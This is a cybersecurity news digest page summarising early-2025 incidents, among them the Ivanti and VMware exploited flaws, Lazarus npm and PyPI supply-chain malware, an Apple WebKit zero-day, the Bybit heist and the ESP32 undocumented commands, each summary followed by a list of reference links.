CyberSecurity news

FlagThis

Mandvi@Cyber Security News //
CISA has added three critical Ivanti Endpoint Manager (EPM) flaws to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation in the wild. The affected vulnerabilities are CVE-2024-13159, CVE-2024-13160, and CVE-2024-13161. These flaws are absolute path traversal vulnerabilities that could allow remote, unauthenticated attackers to fully compromise vulnerable servers, potentially granting unauthorized access to sensitive information. Federal agencies have been given until March 31, 2025, to apply the necessary patches and mitigate these threats.

CISA urges all organizations, including those in the private sector, to prioritize timely remediation of these Ivanti EPM vulnerabilities. Security experts warn that delays in patching can lead to full domain compromise, credential theft, and lateral movement by malicious actors. Given the recent history of Ivanti vulnerabilities, proactive security measures and rapid patching are essential to defend against potential attacks. The large market share of Ivanti products makes them a prime target for malicious actors, emphasizing the importance of immediate patching and continuous hardening of systems.

Recommended read:
References :
  • BleepingComputer: CISA tags critical Ivanti EPM flaws as actively exploited in attacks
  • : CISA Urges All Organizations to Patch Exploited Critical Ivanti Vulnerabilities
  • www.scworld.com: 3 Ivanti flaws added to CISA list of known exploited vulnerabilities
  • The DefendOps Diaries: Addressing Critical Vulnerabilities in Ivanti Endpoint Manager
  • www.cybersecuritydive.com: CISA: 3 Ivanti endpoint vulnerabilities exploited in the wild
  • Cyber Security News: CISA Adds 3 Ivanti Endpoint Manager Flaws to Exploited Vulnerabilities Catalog

rohann@checkpoint.com@Check Point Blog //
References: Check Point Blog , bsky.app , bsky.app ...
Blind Eagle, one of Latin America's most dangerous cyber criminal groups, has been actively targeting Colombian institutions and government entities since November 2024. According to Check Point Research (CPR), this advanced persistent threat (APT) group, also tracked as APT-C-36, is using sophisticated techniques to bypass traditional security defenses. They leverage trusted platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute their malicious payloads, and have recently been seen using a variant of an exploit for a now-patched Microsoft Windows flaw, CVE-2024-43451. This allows them to infect victims with a high rate of success.

CPR has uncovered that Blind Eagle incorporated this exploit a mere six days after Microsoft released the patch. They use malicious .URL files distributed via phishing emails, and victims are often unaware they are triggering the infection. The final payload is often the Remcos RAT, a remote access trojan that grants attackers complete control over infected systems, allowing for data theft, remote execution, and persistent access. In one campaign in December 2024, over 1,600 victims were affected, highlighting the group's efficiency and targeted approach.

Recommended read:
References :
  • Check Point Blog: The Growing Danger of Blind Eagle: One of Latin America’s Most Dangerous Cyber Criminal Groups Targets Colombia
  • bsky.app: Blind Eagle APT group has compromised over 1,600 victims inside Colombian institutions and government agencies. The campaign took place in November & December of last year and used an exploit similar to a zero-day exploited by Russian hackers in Ukraine.
  • The Hacker News: The threat actor known as Blind Eagle has been linked to a series of ongoing campaigns targeting Colombian institutions and government entities since November 2024.
  • bsky.app: The Blind Eagle APT group has compromised over 1,600 victims inside Colombian institutions and government agencies. The campaign took place in November & December of last year and used an exploit similar to a zero-day exploited by Russian hackers in Ukraine.
  • gbhackers.com: Blind Eagle Hackers Exploit Google Drive, Dropbox & GitHub to Evade Security Measures
  • : Blind Eagle has been running campaigns targeting the Colombian government with malicious .url files and phishing attacks
  • Talkback Resources: Blind Eagle Hacks Colombian Institutions Using NTLM Flaw, RATs and GitHub-Based Attacks

Matan Mittelman@Cato Networks //
References: bsky.app , Secure Bulletin , Cato Networks ...
The Ballista botnet is actively exploiting CVE-2023-1389, a remote code execution vulnerability in TP-Link Archer routers, to spread across the internet. Cato Networks' Cato CTRL researchers have uncovered this new IoT threat, linking it to an Italian threat actor due to IP addresses and Italian language strings found in the malware binaries. Since its detection in January 2025, Ballista has targeted organizations in the U.S., Australia, China, and Mexico, impacting sectors like manufacturing, healthcare, technology, and services.

This botnet leverages a vulnerability in TP-Link Archer AX-21 routers that allows unauthorized command execution through manipulated country parameters in router APIs. Despite patches being available, over 6,000 internet-exposed devices remain vulnerable, according to Censys. Once installed, the malware establishes a TLS-encrypted command-and-control (C2) channel on port 82, enabling full device control, DDoS attack execution, and shell command execution. The threat actor is also transitioning to Tor-based C2 domains to complicate tracking and takedowns.

Recommended read:
References :
  • bsky.app: New Ballista botnet found -Author seems to be from Italy -Targets TP-Link Archer routers -Used for DDoS accounts -Unique code, not based on Mirai or Mozi
  • Secure Bulletin: The Ballista Botnet: a new IoT threat with italian roots
  • securityaffairs.com: New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?
  • Cato Networks: Cato CTRLâ„¢ Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers
  • The Hacker News: Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices
  • CyberInsider: TP-Link Archer Routers Under Attack by New IoT Botnet ‘Ballista’
  • Blog: New Ballista botnet targets vulnerabilities in popular TP-Link routers

SC Staff@scmagazine.com //
The Lazarus Group, a North Korean APT, is actively targeting developers through the npm ecosystem by publishing malicious packages. These packages are designed to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy backdoors. The attackers use typosquatting, mimicking legitimate library names to deceive developers into downloading the compromised versions. The packages contain BeaverTail malware and the InvisibleFerret backdoor and exhibit identical obfuscation techniques, cross-platform targeting, and command-and-control mechanisms consistent with previous Lazarus campaigns.

Six malicious npm packages have been identified, including postcss-optimizer, is-buffer-validator, yoojae-validator, event-handle-package, array-empty-validator, and react-event-dependency. These packages have been collectively downloaded over 330 times and contain the BeaverTail malware, which functions as both an infostealer and a loader designed to steal login credentials, exfiltrate sensitive data, and deploy backdoors in compromised systems. The Lazarus Group also maintained GitHub repositories for five of the malicious packages, lending an appearance of open source legitimacy.

Recommended read:
References :
  • The DefendOps Diaries: Lazarus Group's Latest Supply Chain Attacks on Developers
  • BleepingComputer: North Korean Lazarus hackers infect hundreds via npm packages
  • bsky.app: Reports on the six malicious npm packages linked to the Lazarus Group.
  • The Hacker News: The Lazarus Group, a North Korean APT, is actively targeting the npm ecosystem by publishing malicious packages that closely mimic legitimate libraries, deceiving developers into incorporating harmful code into their projects.
  • socket.dev: North Korea’s Lazarus Group continues to infiltrate the npm ecosystem, deploying six new malicious packages designed to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy a backdoor.
  • securityaffairs.com: Lazarus Strikes npm Again with New Wave of Malicious Packages
  • hackread.com: Lazarus Group Hid Backdoor in Fake npm Packages in Latest Attack
  • cyberscoop.com: Lazarus Group deceives developers with 6 new malicious npm packages
  • www.scworld.com: Malware spread by Lazarus Group via counterfeit npm packages

MSSP Alert@MSSP feed for Latest //
Apple has released emergency security updates to address a zero-day vulnerability in WebKit, identified as CVE-2025-24201. The company stated that this flaw was actively exploited in "extremely sophisticated" attacks targeting specific individuals. The vulnerability resided within the WebKit browser engine, which powers Safari and various other applications across macOS, iOS, and other platforms. Exploitation of this flaw allowed attackers to bypass the Web Content sandbox, a critical security feature designed to isolate web processes from the rest of the system, potentially leading to unauthorized actions.

Apple's swift response included patches for iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2, and Safari 18.3.1. The vulnerability impacted a wide range of Apple devices, including iPhone XS and later, iPad Pro models, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, as well as Macs running macOS Sequoia and Apple Vision Pro. The tech giant has so far not disclosed if its own researchers or others outside of the company discovered the vulnerability.

Recommended read:
References :
  • The DefendOps Diaries: Apple's Swift Response to WebKit Zero-Day Vulnerability: CVE-2025-24201
  • BleepingComputer: Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks
  • securityaffairs.com: Apple fixed the third actively exploited zero-day of 2025
  • CyberInsider: Apple Patches Zero-Day Flaw Used in Targeted iPhone Attacks
  • Threats | CyberScoop: Apple released emergency software patches Tuesday that address a newly identified zero-day vulnerability in the company’s WebKit web browser engine.  Tracked as CVE-2025-24201, an attacker can potentially escape the constraints of Webkit’s Web Content sandbox, potentially leading to unauthorized actions.
  • techcrunch.com: The flaw was in the browser engine WebKit, used by Safari and other apps.
  • bsky.app: Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.
  • bsky.app: Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.
  • infosec.exchange: NEW: Apple patched a zero-day in WebKit that “may have been exploited in an extremely sophisticated attack against specific targeted individuals.â€� This is second time, AFAICT, that Apple uses the "extremely sophisticated" phrase for a patched bug.
  • The Hacker News: Apple Releases Patch for WebKit Zero-Day Vulnerability Exploited in Targeted Attacks
  • www.csoonline.com: Apple patches zero-day bugs used in targeted iPhone attacks
  • Blog: FieldEffect blog post on apple-emergency-update-extremely-sophisticated-zero-day.
  • : iOS 18.3.2 Patches Actively Exploited WebKit Vulnerability
  • MSSP feed for Latest: Apple Addresses Actively-Exploited Zero-Day In WebKit Browser Engine

@The DefendOps Diaries //
Microsoft's March 2025 Patch Tuesday has addressed 57 flaws, including seven zero-day vulnerabilities that were already being actively exploited. These zero-day flaws highlight the importance of applying security updates in a timely manner. Three critical vulnerabilities were remote code execution vulnerabilities, posing a high risk that could lead to full system compromise if exploited. One notable zero-day vulnerability is the Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability (CVE-2025-24983), which could allow attackers to gain SYSTEM privileges through a race condition.

Microsoft has also announced that it will drop support for the Remote Desktop app, available through the Microsoft Store, on May 27th. The current app will be replaced with the new Windows App, designed for work and school accounts. Microsoft is encouraging users to review the known issues and limitations of the Windows App to understand any feature gaps that may create challenges during migration. The Windows App is intended to connect to Azure Virtual Desktop, Windows 365, Microsoft Dev Box, Remote Desktop Services, and remote PCs.

Recommended read:
References :
  • isc.sans.edu: Microsoft Patch Tuesday: March 2025, (Tue, Mar 11th)
  • The DefendOps Diaries: Microsoft's March 2025 Patch Tuesday: Addressing Critical Vulnerabilities
  • BleepingComputer: Microsoft March 2025 Patch Tuesday fixes 7 zero-days, 57 flaws
  • CyberInsider: Microsoft March 2025 ‘Patch Tuesday’ Updates Fix Six Actively Exploited Flaws
  • Tenable Blog: Microsoft’s March 2025 Patch Tuesday Addresses 56 CVEs (CVE-2025-26633, CVE-2025-24983, CVE-2025-24993)
  • bsky.app: Today is Microsoft's March 2025 Patch Tuesday, which includes security updates for 57 flaws, including six actively exploited zero-day vulnerabilities.
  • krebsonsecurity.com: Microsoft: 6 Zero-Days in March 2025 Patch Tuesday
  • Blog RSS Feed: March 2025 Patch Tuesday Analysis
  • Threats | CyberScoop: Microsoft patches 57 vulnerabilities, including 6 zero-days
  • The Register - Software: Choose your own Patch Tuesday adventure: Start with six zero-day fixes, or six critical flaws
  • hackread.com: March 2025 Patch Tuesday: Microsoft Fixes 57 Vulnerabilities, 7 Zero-Days
  • www.kaspersky.com: Main vulnerabilities from Microsoft's March Patch Tuesday | Kaspersky official blog
  • Rescana: Microsoft March 2025 Patch Tuesday: Zero-Day Exploitation Analysis in WinDbg, ASP.NET Core, and Remote Desktop
  • socradar.io: March 2025 Patch Tuesday: Microsoft Fixes 6 Critical & 6 Exploited Security Vulnerabilities

info@thehackernews.com (The@The Hacker News //
The APT group SideWinder is expanding its attacks, now targeting maritime, nuclear, and IT sectors across Asia, the Middle East, and Africa. Previously focused on government, military, and diplomatic institutions, the group has shifted its attention to maritime infrastructure, logistics companies, nuclear power plants, and energy facilities. The attacks, observed by Kaspersky, have spread across multiple countries including Bangladesh, Cambodia, Djibouti, Egypt, the United Arab Emirates, and Vietnam.

Kaspersky experts have noted an increase in attacks on nuclear power plants and energy generation facilities with the attackers utilizing spear-phishing emails and malicious documents containing industry-specific terminology to gain trust. The group exploits an older Microsoft Office vulnerability (CVE-2017-11882) to bypass detection systems and access operational data, research projects, and personnel data. According to Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov, SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems.

Recommended read:
References :
  • The Register - Security: Sidewinder goes nuclear, charts course for maritime mayhem in tactics shift
  • The Hacker News: SideWinder APT Targets Maritime, Nuclear, and IT Sectors Across Asia, Middle East, and Africa
  • www.it-daily.net: SideWinder now also attacks nuclear power plants
  • securityaffairs.com: SideWinder APT targets maritime and nuclear sectors with enhanced toolset
  • Rescana: Inside the Mind of Sidewinder: A Real-World Look at a Sophisticated Cyber Adversary

Pierluigi Paganini@Security Affairs //
CISA has added multiple vulnerabilities in Advantive VeraCore to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The five flaws impact both Advantive VeraCore and Ivanti Endpoint Manager (EPM) with agencies being urged to apply patches by March 31, 2025.

The VeraCore vulnerabilities, CVE-2024-57968 and CVE-2025-25181, are being exploited by the XE Group, a Vietnamese threat actor, to deploy reverse shells and web shells for persistent remote access. CVE-2024-57968 is an unrestricted file upload vulnerability, while CVE-2025-25181 is an SQL injection vulnerability. There are currently no public reports about how the three Ivanti EPM flaws are being weaponized in real-world attacks.

Recommended read:
References :
  • securityaffairs.com: U.S. CISA adds Advantive VeraCore and Ivanti EPM flaws to its Known Exploited Vulnerabilities catalog
  • The Hacker News: CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List
  • Talkback Resources: CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List [exp] [ics]
  • www.scworld.com: Advantive VeraCore, Ivanti EPM flaws added to CISA vulnerabilities catalog
  • cyble.com: CISA Adds Five New Vulnerabilities to Its Known Exploited Vulnerabilities Catalog

do son@Cybersecurity News //
A critical security vulnerability, CVE-2025-24813, has been identified in Apache Tomcat, potentially exposing servers to remote code execution (RCE) and data leaks. The vulnerability stems from a path equivalence issue related to how Tomcat handles filenames with internal dots, particularly when writes are enabled for the default servlet and partial PUT support is enabled. This flaw could allow attackers to execute malicious code, disclose sensitive information, or inject malicious content into uploaded files.

Users of Apache Tomcat versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98 are advised to upgrade immediately to versions 11.0.3, 10.1.35, or 9.0.99 respectively, which include the necessary fixes. The vulnerability exists if an application uses Tomcat's file-based session persistence with the default storage location and includes a library susceptible to deserialization attacks, potentially leading to remote code execution. COSCo Shipping Lines DIC and sw0rd1ight are credited with discovering and reporting the vulnerability.

Recommended read:
References :
  • gbhackers.com: Apache Tomcat Flaw Could Allow RCE Attacks on Servers
  • cR0w :cascadia:: Tomcat vulns are always fun, right? H/T: Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  • buherator's timeline: [oss-security] CVE-2025-24813: Apache Tomcat: Potential RCE and/or information disclosure and/or ...
  • Open Source Security: CVE-2025-24813: Apache Tomcat: Potential RCE and/or information disclosure and/or information corruption with partial PUT
  • securityonline.info: CVE-2025-24813 Flaw in Apache Tomcat Exposes Servers to RCE, Data Leaks: Update Immediately
  • buherator's timeline: Analysis of CVE-2025-24813 Apache Tomcat Path Equivalence RCE

Thomas Brewster,@Thomas Fox-Brewster //
Bybit, a cryptocurrency exchange, suffered a massive loss of $1.5 billion due to North Korean hackers, marking a record-breaking heist. Investigations revealed the breach stemmed from a compromised account on a free digital storage service, highlighting the vulnerabilities even established crypto platforms face. Law enforcement agencies are now engaged in a cat-and-mouse game to recover the stolen cryptocurrency before it is converted into untraceable currency.

This incident underscores the growing threat of sophisticated cyberattacks targeting the cryptocurrency sector. North Korean hackers, specifically the Lazarus Group, are believed to be responsible for the attack. Concerns remain about the security measures implemented by cryptocurrency exchanges and the need for stronger protocols to safeguard user funds from these types of breaches.

Recommended read:
References :
  • Thomas Fox-Brewster: Feds Suspect LastPass Hackers Stole $150 Million In Crypto From One Person
  • fortune.com: How North Korea cracked Bybit’s crypto safe to steal $1.5 billion in a record heist
  • News ? Metro: North Korean hackers cash out £300,000,000 after billion-pound crypto heist
  • Virus Bulletin: NCC Group's Mario Rivas, Ruben Santos & Jorge Sanz present a technical analysis of the Bybit hack that led to the largest cryptocurrency theft ever recorded, with more than $1.4 billion assets, including 401,347 ETH, drained from its cold wallet.
  • Kaspersky official blog: How to store cryptocurrency after the Bybit hack | Kaspersky official blog

Dissent@DataBreaches.Net //
New York Attorney General Letitia James has filed a lawsuit against Allstate Insurance and National General Insurance for allegedly failing to protect the personal information of New York residents. The lawsuit stems from data breaches in 2020 and 2021 that exposed the driver's license numbers of over 165,000 New Yorkers. The Attorney General's office claims that National General's online auto insurance quoting tools were intentionally designed to display consumers' full driver's license numbers in plain text, making them easily accessible to attackers.

The breaches occurred because the company failed to adequately encrypt and secure databases containing personal information. Attackers exploited vulnerabilities in Allstate's National General business unit's websites. The first breach went undetected for two months, and the company allegedly failed to notify affected consumers or relevant state agencies. A second, larger breach occurred due to continued security weaknesses. Attorney General James seeks penalties and an injunction to prevent further violations.

Recommended read:
References :
  • DataBreaches.Net: NEW YORK – New York Attorney General Letitia James today filed a lawsuit against several insurance companies doing business as National General and Allstate Insurance Company (Allstate) for failing to protect New Yorkers’ personal information from cyberattacks.
  • The Register - Security: Crooks built bots to exploit astoundingly bad quotation website and made off with data on thousands New York State has sued Allstate Insurance for operating websites so badly designed they would deliver personal information in plain-text to anyone that went looking for it.
  • www.scworld.com: New York attorney general hits Allstate with suit over data breaches
  • The Register: Allstate Insurance sued for delivering personal info on a platter, in plaintext, to anyone who went looking for it
  • www.infosecurity-magazine.com: New York sues Allstate Over Data Breach and Security Failures
  • www.techradar.com: Allstate sued for exposing personal customer information in plaintext
  • CyberScoop: New York sues Allstate and subsidiaries for back-to-back data breaches

Sunny Yadav@eSecurity Planet //
A large-scale cryptocurrency miner campaign is currently targeting Russian users, employing the SilentCryptoMiner malware. The malware disguises itself as a legitimate tool designed to bypass internet restrictions, enticing users to download and install it. This campaign has already affected over 2,000 Russian users, who were tricked into downloading fake VPN and DPI bypass tools.

The attackers are distributing the malware through popular YouTube channels, with some boasting over 60,000 subscribers. The malicious files are presented as safe tools, while in reality, the archive contains a Python-based loader that retrieves the miner payload. To further their deception, attackers instruct victims to disable their antivirus programs, falsely claiming they trigger false positives, further exposing their systems to persistent, hidden threats.

Recommended read:
References :
  • securityaffairs.com: Large-scale cryptocurrency miner campaign targets Russian users with SilentCryptoMiner
  • thehackernews.com: SilentCryptoMiner infects 2,000 Russian users via fake VPN and DPI Bypass Tools
  • eSecurity Planet: SilentCryptoMiner Infects 2,000 Russian Users via Fake VPN Tools

@cyberalerts.io //
Davis Lu, a 55-year-old software developer from Houston, Texas, has been convicted in federal court for sabotaging the computer systems of his former employer, Eaton Corp, after a demotion in 2018 led to reduced responsibilities and system access. Lu, who worked for the company from November 2007 to October 2019, introduced malicious code onto the company's production systems starting in August 2019. This code included "infinite loops" designed to exhaust Java threads, causing system crashes and preventing user logins. Lu also wrote code to delete coworker profile files and implemented a "kill switch" that would lock out all users if his credentials in the company's active directory were disabled.

The "kill switch," named "IsDLEnabledinAD" (abbreviating "Is Davis Lu enabled in Active Directory"), was automatically activated upon his termination on Sept. 9, 2019, impacting thousands of company users globally. Additional code was named "Hakai," meaning "destruction" in Japanese, and "HunShui," meaning "sleep" or "lethargy" in Chinese. On the day he was directed to turn in his company laptop, Lu deleted encrypted data and his internet search history revealed that he had researched methods to escalate privileges, hide processes, and rapidly delete files, indicating an intent to obstruct efforts of his co-workers to resolve the system disruptions. Lu now faces a maximum penalty of 10 years in prison for causing intentional damage to protected computers.

Recommended read:
References :
  • DataBreaches.Net: Texas Man Convicted of Sabotaging his Employer’s Computer Systems and Deleting Data
  • The Register - Software: Developer sabotaged ex-employer with kill switch activated when he was let go
  • www.bleepingcomputer.com: Developer guilty of using kill switch to sabotage employer's systems
  • bsky.app: BSky Post on Sabotaging
  • BleepingComputer: A software developer has been found guilty of sabotaging his ex-employer's systems by running custom malware and installing a "kill switch" after being demoted at the company.
  • : Software developer Davis Lu cost his employer hundreds of thousands after deploying malware that caused crashes and failed logins
  • Tech Monitor: Texas software developer found guilty of sabotaging corporate network
  • PCMag UK security: Developer Found Guilty of Adding 'Kill Switch' to Company Network
  • Policy ? Ars Technica: Developer convicted for “kill switchâ€� code activated upon his termination
  • Tech Monitor: A federal jury in Cleveland convicted a former software developer for deliberately disrupting the computer systems of his former employer.

Sergiu Gatlan@BleepingComputer //
Cybersecurity experts are warning of a mass exploitation of a critical PHP vulnerability, CVE-2024-4577. This flaw allows attackers to remotely execute code on vulnerable servers using Apache and PHP-CGI. GreyNoise data has confirmed that the exploitation extends far beyond initial reports, with attack attempts observed across multiple regions. Notable spikes have been detected in the United States, Singapore, Japan, and other countries throughout January 2025, signaling a broad campaign targeting this vulnerability.

Cisco Talos has discovered an active exploitation of CVE-2024-4577. The attacker gains access to victim machines and carries out post-exploitation activities. The attempted exploitation has escalated across the U.S., Japan, Singapore, and other parts of the world. GreyNoise detected over 1,000 attacks globally. Experts urge organizations to apply the necessary patches and monitor for suspicious activity to mitigate the risk of compromise.

Recommended read:
References :
  • Cisco Talos Blog: Cisco Talos has discovered an active exploitation of CVE-2024-4577 by an attacker in order to gain access to the victim's machines and carry out post-exploitation activities.
  • securityaffairs.com: Threat actors exploit PHP flaw CVE-2024-4577 for remote code execution. Over 1,000 attacks detected globally.
  • www.scworld.com: Attempted exploitation escalated across the U.S., Japan, Singapore, and other parts of the world.
  • www.cybersecuritydive.com: Critical PHP vulnerability under widespread cyberattack
  • The GreyNoise Blog: GreyNoise Detects Mass Exploitation of Critical PHP-CGI Vulnerability (CVE-2024-4577), Signaling Broad Campaign
  • MSSP feed for Latest: Targeting Of Critical PHP Vulnerability Expands Gloabally
  • www.techradar.com: Experts warn this critical PHP vulnerability could be set to become a global problem
  • www.scworld.com: Critical 9.8 PHP flaw exploited in US, Japan and Singapore
  • The DefendOps Diaries: Explore CVE-2024-4577, a critical PHP vulnerability affecting CGI mode on Windows, and learn about its implications and mitigation strategies.
  • BleepingComputer: Threat intelligence company GreyNoise warns that a critical PHP remote code execution vulnerability that impacts Windows systems is now under mass exploitation.
  • bsky.app: Threat intelligence company GreyNoise warns that a critical PHP remote code execution vulnerability that impacts Windows systems is now under mass exploitation.

Ashish Khaitan@The Cyber Express //
CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog to include critical vulnerabilities affecting VMware ESXi, Workstation, Fusion, and Linux kernel. These flaws are actively being exploited, posing a significant risk, particularly for federal government organizations. Rapid patching is essential to mitigate the active cyber threats associated with these vulnerabilities.

The identified VMware vulnerabilities, CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, allow for remote code execution (RCE) and privilege escalation. Specifically, CVE-2025-22224 is a Time-of-Check Time-of-Use (TOCTOU) vulnerability with a CVSSv3 score of 9.3, classified as Critical. The affected systems include various versions of VMware ESXi, Workstation, Fusion, Cloud Foundation, and Telco Cloud Platform, with updated versions available to address the flaws.

Recommended read:
References :

Samarth Mishra@cysecurity.news //
A malicious Python package named 'set-utils' has been discovered on the Python Package Index (PyPI) repository. This package is designed to steal Ethereum private keys by exploiting commonly used account creation functions. Disguised as a utility for Python sets, the package mimics popular libraries, tricking developers into installing it. Since its appearance, 'set-utils' has been downloaded over 1,000 times, posing a significant threat to Ethereum users and developers, particularly those working with Python-based wallet management libraries. The Python security team has removed the malicious package from PyPI.

The 'set-utils' package operates by silently modifying standard Ethereum wallet creation functions. The private keys are exfiltrated within blockchain transactions via the Polygon RPC endpoint to resist traditional detection efforts. The stolen keys are encrypted using an attacker-controlled RSA public key before transmission, making detection challenging. Even if the package is uninstalled, any Ethereum wallets created while it was active remain compromised. To mitigate these risks, developers should employ regular dependency audits and automated scanning tools to detect malicious behaviors in third-party packages.

Recommended read:
References :
  • The Hacker News: Cybersecurity researchers have discovered a malicious Python package on the Python Package Index (PyPI) repository that's equipped to steal a victim's Ethereum private keys by impersonating popular libraries.
  • Developer Tech News: A malicious package designed to steal private keys for Ethereum wallets has been uncovered within the Python Package Index (PyPI). According to Socket, this package – named ‘set-utils’ – masquerades as a utility for Python sets and has been actively targeting developers.
  • Cyber Security News: PyPI Malware Exploits Developers to Hijack Ethereum Wallets
  • gbhackers.com: New PyPI Malware Targets Developers to Steal Ethereum Wallets
  • www.cysecurity.news: Researchers at have exposed a malicious PyPi (Python Package Index package), set-utils, that steals Ethereum private keys by abusing a “commonly used account creation functions.â€�

Lily Hay@WIRED //
Cybercriminals have allegedly stolen over $635,000 worth of Taylor Swift concert tickets by exploiting a loophole in an offshore ticketing system. Two individuals, Tyrone Rose, 20, and Shamara Simmons, 31, have been arrested and charged with grand larceny and computer tampering. The scheme involved stealing URLs for nearly 1,000 tickets to various events, including Taylor Swift's Eras Tour, Ed Sheeran concerts, Adele concerts, NBA games, and the US Open Tennis Championships, before reselling them for substantial profit.

Between June 2022 and July 2023, Rose and Simmons allegedly stole the tickets through an offshore ticket vendor and then resold them on StubHub in the US for significant profit. Rose, an employee of Sutherland Global Services, a third-party contractor for StubHub Jamaica, is accused of abusing his access to the network to find a backdoor. Prosecutors say the pair stole the tickets by allegedly intercepting approximately 350 orders from StubHub. The investigation is ongoing to determine if the Swift ticket scam was part of a wider operation.

Recommended read:
References :
  • WIRED: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets
  • The Register - Security: Alleged cyber scalpers Swiftly cuffed over $635K Taylor ticket heist
  • The DefendOps Diaries: Cybercrime Exposes Vulnerabilities in Ticketing Systems: A Case Study
  • BleepingComputer: Cybercrime 'crew' stole $635,000 in Taylor Swift concert tickets
  • darkmarc.substack.com: Cybercriminals pulled off a massive ATM heist, hackers stole $600K in Taylor Swift concert tickets, and Mark Cuban made a bold move for laid-off tech workers. Instagram users were hit with a disturbing glitch, and Mozilla’s new terms sparked privacy fears. Here’s what happened this week.
  • www.techradar.com: Cybercriminals used vendor backdoor to steal almost $600,000 of Taylor Swift tickets
  • bsky.app: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets

Mandvi@Cyber Security News //
A critical zero-day vulnerability, dubbed EvilLoader, has been discovered in Telegram for Android by security researcher 0x6rss. This exploit allows attackers to disguise malicious APK files as video files, potentially leading to unauthorized malware installations on users' devices. The vulnerability exploits Telegram's file handling mechanism, tricking the app into treating HTML files with .mp4 extensions as legitimate video files, even though the file is not a video file.

When a user attempts to play these crafted "videos," Telegram prompts them to open the file in an external application, potentially leading to the installation of malicious software. For the attack to succeed, users must click the embedded link multiple times, disable Android’s security restriction on installing apps from unknown sources, and proceed with the installation. The file facilitating this attack has been available for sale on underground hacker forums.

Recommended read:
References :
  • Cyber Security News: A critical zero-day vulnerability in Telegram for Android, dubbed EvilLoader, has been discovered by security researcher 0x6rss. This exploit allows attackers to disguise malicious APKs as video files, potentially leading to unauthorized malware installations on users’ devices.
  • WeLiveSecurity: ESET researchers discuss how they uncovered a zero-day Telegram for Android exploit that allowed attackers to send malicious files posing as videos
  • securityonline.info: Telegram’s EvilLoader: Hackers Exploit Video Flaw Again

Veronika Telychko@SOC Prime Blog //
An undocumented "backdoor," which is really undocumented commands, has been discovered in the ESP32 microchip, a product of the Chinese manufacturer Espressif. This chip is a cornerstone in the Internet of Things (IoT) ecosystem, providing essential Bluetooth and Wi-Fi connectivity. It is widely used in over a billion devices as of 2023. The "backdoor," as it is referred to, could be leveraged for attacks including spoofing trusted devices, unauthorized data access, and pivoting to other devices on the network.

This discovery was made by Spanish researchers Miguel Tarascó Acuña and Antonio Vázquez Blanco from Tarlogic Security, who presented their findings at RootedCON. Their research underscores the critical need for robust security measures in IoT devices. The potential impact could be extensive, considering the chip’s widespread usage. This discovery raises concerns about the security of numerous devices and systems that rely on the ESP32 for their operations.

Recommended read:
References :
  • infosec.exchange: Ok, poll for the "supply chain risk management" people! There's a backdoor in the ESP32 wifi/bluetooth chip.
  • Anonymous ???????? :af:: The ubiquitous microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • The DefendOps Diaries: Discover the ESP32 backdoor's impact on IoT security and the urgent need for robust protection measures.
  • www.bleepingcomputer.com: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • BleepingComputer: Infosec.Exchange post about ESP32 Microchip Backdoor
  • BleepingComputer: Infosec.Exchange post about ESP32 microchip with undocumented backdoor.
  • Jon Greig: IOC.Exchange post about the backdoor
  • TARNKAPPE.INFO: Bluetooth-Chip-Backdoor entdeckt: Ãœber 1 Mrd. Geräte betroffen
  • Rescana: Unveiling the ESP32 Bluetooth Chip Backdoor: Security Vulnerabilities and Mitigation Strategies
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains undocumented commands that could be leveraged for attacks.
  • dragosr: Oh, is that all? A few (billion?) ESP32 devices let attackers establish persistency in local flash using an undocumented commands set accessible from an over the air pivot, and low level protocol injection and spoofing control...
  • securityaffairs.com: Undocumented hidden feature found in Espressif ESP32 microchip
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • Davey Winder: Identity Theft Warning—Hidden Commands In 1 Billion Bluetooth Chips
  • www.techradar.com: Top Bluetooth chip security flaw could put a billion devices at risk worldwide
  • Security | TechRepublic: Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
  • BetaNews: Attackers can use undocumented commands to hijack Chinese-made Bluetooth chips
  • CyberInsider: Hidden Commands Discovered in Bluetooth Chip Used in a Billion Devices
  • bsky.app: Undocumented "backdoor" found in Bluetooth chip used by a billion devices
  • Matthew Rosenquist: The recent undocumented code in the ESP32 microchip, made by Chinese manufacturer Espressif Systems, is used in over 1 billion devices and could represent a cybersecurity risk.
